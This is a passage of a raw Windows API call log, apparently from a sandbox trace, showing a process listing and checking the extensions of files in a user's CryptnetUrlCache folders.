FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0217.756] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0217.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0217.756] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0217.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0217.756] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0217.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0217.756] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0217.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbddd270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xd2da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0217.756] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0217.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0217.756] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0217.756] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0217.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0217.757] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0217.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0217.757] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0217.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0217.757] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0217.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0217.757] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0217.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0217.757] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0217.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0217.757] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x64b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0217.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0217.758] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0217.759] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0217.759] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0217.759] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0217.759] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0217.759] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.760] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.760] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0217.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0217.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.760] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.760] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.760] PathFindFileNameW (pszPath="") returned="" [0217.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.766] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0217.768] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0217.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0217.768] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0217.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, 